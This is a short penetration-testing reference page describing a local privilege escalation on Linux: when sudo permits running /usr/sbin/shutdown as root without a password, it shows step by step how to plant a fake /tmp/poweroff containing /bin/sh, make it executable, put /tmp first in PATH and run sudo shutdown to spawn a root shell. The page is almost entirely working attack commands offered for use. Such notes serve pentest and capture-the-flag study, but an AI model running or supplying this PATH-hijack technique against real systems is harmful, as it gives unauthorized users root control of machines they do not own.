Sudo Shutdown, Poweroff Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).


sudo -l

(ALL) NOPASS: /usr/sbin/shutdown

If we can execute "shutdown" command as root, we can gain access to privileges by overwriting the path of "poweroff".


First create /tmp/poweroff binary which invoke a shell.

echo /bin/sh > /tmp/poweroff
# or
echo /bin/bash > /tmp/poweroff

Then change permissions of the file and add "/tmp" folder to PATH.

chmod +x /tmp/poweroff
export PATH=/tmp:$PATH

Now execute "shutdown" as root.

# Some SUID command
sudo /usr/sbin/shutdown

# Then you are root user

/tmp/poweroff is executed and spawn a root shell.